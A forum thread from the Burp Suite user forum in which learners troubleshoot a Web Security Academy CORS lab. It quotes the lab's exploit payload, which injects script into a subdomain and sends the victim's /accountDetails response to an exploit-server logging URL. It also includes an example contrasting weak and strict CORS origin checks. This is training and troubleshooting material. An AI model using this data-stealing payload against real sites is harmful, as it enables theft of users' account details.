The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

Lab Not Working Anymore: CORS vulnerability with trusted insecure protocols

Achint | Last updated: Apr 12, 2024 09:22AM UTC

I am trying to solve the mentioned lab, with the payload provided by the academy, but the payload isn't working. When I view the payload, the request is indeed sent to the stock subdomain, but it replies with "Unauthorized", since the cookie is not included in the request.

## Payload

```html
<script>
document.location="http://stock.0ad000570345633e81fd1b55005d001d.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0ad000570345633e81fd1b55005d001d.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://exploit-0a8d001a039663f481a91aaa0144009c.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>
```

## Response From /accountDetails

```http
HTTP/2 401 Unauthorized
Content-Type: application/json; charset=utf-8
Set-Cookie: session=EgIsHteiGser2A2asuxMQRV1BMAKIFfg; Secure; HttpOnly; SameSite=None
X-Frame-Options: SAMEORIGIN
Content-Length: 14

"Unauthorized"
```

I am using Burp's in-built browser.

Achint | Last updated: Apr 12, 2024 09:25AM UTC

Found the solution: this is because the lab is setting the `Secure` flag on the cookie, but the mentioned payload specifies `http` for the stock subdomain, hence the cookie is not sent. Kindly fix that.
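The thread turns on the lab trusting an http:// subdomain origin, which is exactly the server-side mistake this lab class is named after. As an added illustration (not code from the lab or from PortSwigger), here is a CORS origin check that reflects any subdomain regardless of scheme, beside a hardened check that only reflects https origins from an explicit allow-list; the `SITE` host is a placeholder standing in for the lab's YOUR-LAB-ID host.

```javascript
// Added example, not the lab's or PortSwigger's code. SITE is a placeholder.
const SITE = "your-lab-id.web-security-academy.net";

// Weak check: any origin whose host is the site or one of its subdomains is
// reflected, and the scheme is never inspected. A page served over plain
// http:// on a subdomain is therefore trusted with credentials, which is the
// "trusted insecure protocols" weakness the lab demonstrates.
function weakAllowOrigin(origin) {
  let url;
  try { url = new URL(origin); } catch { return null; } // "null" or junk: no CORS headers
  if (url.hostname === SITE || url.hostname.endsWith("." + SITE)) {
    return {
      "Access-Control-Allow-Origin": origin,
      "Access-Control-Allow-Credentials": "true",
    };
  }
  return null;
}

// Hardened check: exact-match allow-list of https origins only. No suffix
// matching, no plaintext schemes, and Vary: Origin so caches keep responses
// for different origins apart.
const TRUSTED_ORIGINS = new Set([
  "https://" + SITE,
  "https://stock." + SITE,
]);

function strictAllowOrigin(origin) {
  let url;
  try { url = new URL(origin); } catch { return null; }
  if (url.protocol !== "https:") return null;        // never trust an http:// origin
  if (!TRUSTED_ORIGINS.has(url.origin)) return null;  // exact origin match only
  return {
    "Access-Control-Allow-Origin": url.origin,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin",
  };
}

// Constructed sample Origin header values: the two the thread compares,
// plus an unrelated site and the literal "null" origin.
const SAMPLE_ORIGINS = [
  "http://stock." + SITE,
  "https://stock." + SITE,
  "https://attacker.example",
  "null",
];

for (const o of SAMPLE_ORIGINS) {
  console.log(o, "weak:", weakAllowOrigin(o) !== null, "strict:", strictAllowOrigin(o) !== null);
}
```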

Ben, PortSwigger Agent | Last updated: Apr 12, 2024 09:36AM UTC

Hi Achint, having just run through this lab using the embedded browser in the latest version of Burp, I am able to successfully solve it using the solution provided, so it does still appear to be working as expected. Are you logged into the wiener user account when you come to carry out the 'View exploit' functionality and test your exploit?

Achint | Last updated: Apr 12, 2024 09:45AM UTC

Yes, I am logged in as wiener. When I do `View Exploit`, it does land me on the stock subdomain, but the request to /accountDetails returns "unauthorized"; changing the protocol from http to https for the subdomain works.

Achint | Last updated: Apr 12, 2024 09:48AM UTC

# Console Error

```
Access to XMLHttpRequest at 'https://0ad000570345633e81fd1b55005d001d.web-security-academy.net/accountDetails' from origin 'http://stock.0ad000570345633e81fd1b55005d001d.web-security-academy.net' has been blocked by CORS policy: No 'Access-Control-Allow-Origin' header is present on the requested resource.
```

Ben, PortSwigger Agent | Last updated: Apr 12, 2024 11:02AM UTC

Hi Achint, Is it possible for you to send some screenshots or a video of the complete set of steps that you are using so that we can see this exactly? The behaviour that you are seeing is not what I am experiencing so getting some more details would be very useful.

pcu43 | Last updated: May 06, 2024 07:44AM UTC

I just wanted to mention that I also ran into the same issue as the OP. If I change the protocol from "http://stock.YOUR-LAB-ID.web-security-academy.net" to "https://stock.YOUR-LAB-ID.web-security-academy.net" (http to https) in the JavaScript code, then it works.

pcu43 | Last updated: May 06, 2024 07:58AM UTC

To clarify, changing it from "http" to "https" makes the "View exploit" function work, but "Deliver exploit to victim" doesn't work. Changing it back to "http" will prevent "View exploit" function from working, but the "Deliver exploit to victim" will work as designed.

Ben, PortSwigger Agent | Last updated: May 07, 2024 12:20PM UTC

Hi, To confirm, is this when you are using the embedded browser?

pcu43 | Last updated: May 08, 2024 04:42AM UTC

Hi, Yes this is when using the embedded browser.

Ben, PortSwigger Agent | Last updated: May 08, 2024 07:12AM UTC

Hi, If you use a normal version of Chrome, does this allow you to both view and deliver the exploit in the manner described in the written solution?

pcu43 | Last updated: May 09, 2024 07:48AM UTC

OK, yes, the normal version of Chrome works fine for both "View exploit" and "Deliver exploit to victim". These are the current versions of the browsers I have installed:

Embedded: Version 124.0.6367.118 (Official Build) (64-bit)
Normal: Version 124.0.6367.156 (Official Build) (64-bit)

I also just tried the embedded version again since my Burp got updated yesterday, and I still have the same problem with the embedded browser. Clicking on the "View exploit" button hangs on the error page and the GET /accountDetails request returns unauthorized:

```http
HTTP/2 401 Unauthorized
Content-Type: application/json; charset=utf-8
Set-Cookie: session=SXckb2d1WvjJeCZbVLSgC8shRkQqQN1q; Secure; HttpOnly; SameSite=None
X-Frame-Options: SAMEORIGIN
Content-Length: 14

"Unauthorized"
```

Ben, PortSwigger Agent | Last updated: May 09, 2024 12:17PM UTC

Hi, Thank you for confirming that a standard version of Chrome can solve this lab. The embedded browser has a flag enabled by default that is impacting these labs (this flag is not currently enabled in standard versions of Chrome), hence the issues that you are seeing. You would be advised to use a normal version of Chrome whilst we address this issue.

Tyla | Last updated: Jul 18, 2024 08:33AM UTC